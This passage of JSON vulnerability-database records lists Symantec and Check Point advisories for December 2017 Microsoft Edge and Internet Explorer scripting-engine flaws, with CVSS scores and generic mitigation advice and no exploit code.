Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11909 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102085", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102085", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-14T22:40:00", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11911 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11911"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102087", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102087", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-03-12T04:25:06", "description": "### Description\n\nMicrosoft Edge is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Edge Scripting Engine CVE-2017-11914 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102088", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102088", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11930"], "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102058", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102058", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11930 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11890 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11890"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102082", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102082", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "bulletinFamily": "software", "cvelist": ["CVE-2017-11913"], "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. 
Failed attacks will cause denial of service conditions.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "modified": "2017-12-12T00:00:00", "id": "SMNTC-102091", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102091", "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer CVE-2017-11913 Remote Memory Corruption Vulnerability", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer and Edge are prone to a remote memory-corruption vulnerability. Attackers can exploit this issue by enticing an unsuspecting user to view a specially crafted web page. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 11 and Edge are vulnerable.\n\n### Technologies Affected\n\n * Microsoft ChakraCore \n * Microsoft Edge \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer and Edge CVE-2017-11912 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11912"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102092", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102092", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. 
This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11901 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11901"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102046", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102046", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. 
Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. 
Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11903 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11903"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102047", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102047", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:04:25", "description": "### Description\n\nMicrosoft Internet Explorer is prone to a remote memory-corruption vulnerability. Attackers can exploit this issue to execute arbitrary code in the context of the currently logged-in user. Failed attacks will cause denial of service conditions. Internet Explorer 9, 10 and 11 are vulnerable.\n\n### Technologies Affected\n\n * Microsoft Internet Explorer 10 \n * Microsoft Internet Explorer 11 \n * Microsoft Internet Explorer 9 \n\n### Recommendations\n\n**Run all software as a nonprivileged user with minimal access rights.** \nTo reduce the impact of latent vulnerabilities, always run nonadministrative software as an unprivileged user with minimal access rights.\n\n**Deploy network intrusion detection systems to monitor network traffic for malicious activity.** \nDeploy NIDS to monitor network traffic for signs of anomalous or suspicious activity. This includes but is not limited to requests that include NOP sleds and unexplained incoming and outgoing traffic. This may indicate exploit attempts or activity that results from successful exploits.\n\n**Do not follow links provided by unknown or untrusted sources.** \nWeb users should be cautious about following links to sites that are provided by unfamiliar or suspicious sources. 
Filtering HTML from emails may help remove a possible vector for transmitting malicious links to users.\n\n**Implement multiple redundant layers of security.** \nMemory-protection schemes (such as nonexecutable stack and heap configurations and randomly mapped memory segments) will complicate exploits of memory-corruption vulnerabilities.\n\nUpdates are available. Please see the references or vendor advisory for more information.\n", "edition": 2, "cvss3": {}, "published": "2017-12-12T00:00:00", "type": "symantec", "title": "Microsoft Internet Explorer Scripting Engine CVE-2017-11907 Remote Memory Corruption Vulnerability", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2017-11907"], "modified": "2017-12-12T00:00:00", "id": "SMNTC-102045", "href": "https://www.symantec.com/content/symantec/english/en/security-center/vulnerabilities/writeup.html/102045", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T11:31:14", "description": "An information disclosure vulnerability exists in Microsoft Windows. The vulnerability is due to improper parsing of the InfoTech Storage (ITS) protocol requests. 
A remote attacker could exploit this vulnerability by enticing a user to open a malicious webpage or URL.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 6.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2018-01-03T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Windows ITS Protocol Information Disclosure (CVE-2017-11927)", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11927"], "modified": "2018-01-04T00:00:00", "id": "CPAI-2018-0007", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:31:42", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way the scripting engine handles objects in memory. 
An attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11893)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11893"], "modified": "2018-05-29T00:00:00", "id": "CPAI-2017-1033", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:25", "description": "A Memory Corruption Vulnerability exists in Microsoft Edge. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. 
A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11889)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11889"], "modified": "2017-12-25T00:00:00", "id": "CPAI-2017-1034", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:27", "description": "An information disclosure vulnerability exists in Microsoft Internet Explorer. The vulnerability is due to the way the scripting engine improperly handles objects in memory in Internet Explorer. 
A remote attacker can exploit this issue by enticing a user to open a specially crafted web-page with an affected version of Microsoft Internet Explorer.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.3, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 3.6}, "published": "2017-12-20T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Information Disclosure (CVE-2017-11906)", "bulletinFamily": "info", "cvss2": {"severity": "LOW", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 2.6, "vectorString": "AV:N/AC:H/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11906"], "modified": "2017-12-20T00:00:00", "id": "CPAI-2017-1081", "href": "", "cvss": {"score": 2.6, "vector": "AV:N/AC:H/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2021-12-17T11:32:33", "description": "A Type Confusion vulnerability exists in Microsoft Browsers. The vulnerability is due to the way JavaScript engine renders when handling objects in memory. 
Successful exploitation of this vulnerability can achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Browser Scripting Engine Memory Corruption (CVE-2017-11895)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11895"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1035", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:37", "description": "A remote code execution vulnerability exists in Microsoft Explorer. The vulnerability is in the way that Microsoft browser VBScript engines render content when handling objects in memory. 
The vulnerability could corrupt memory in such a way that an attacker could execute arbitrary code in the context of the current user.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Internet Explorer Scripting Engine Memory Corruption (CVE-2017-11886)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11886"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1028", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way Microsoft Edge renders content when it accesses objects in memory. 
A remote unauthenticated attacker could exploit this vulnerability by enticing the target user to open a specially crafted web page.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11909)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11909"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1049", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:36", "description": "A remote code execution vulnerability exists in Microsoft Edge. The vulnerability is due to the way Microsoft Edge improperly accesses objects in memory. 
Successful exploitation of this vulnerability can achieve Remote Code Execution.", "cvss3": {"exploitabilityScore": 1.6, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.5, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2017-12-12T00:00:00", "type": "checkpoint_advisories", "title": "Microsoft Edge Scripting Engine Memory Corruption (CVE-2017-11914)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-11914"], "modified": "2017-12-12T00:00:00", "id": "CPAI-2017-1047", "href": "", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-12-17T11:32:33", "description": "An integer overflow vulnerability exists in Microsoft Browsers. The vulnerability is due to an integer overflow when JavaScript handles a huge number of integers in memory. 
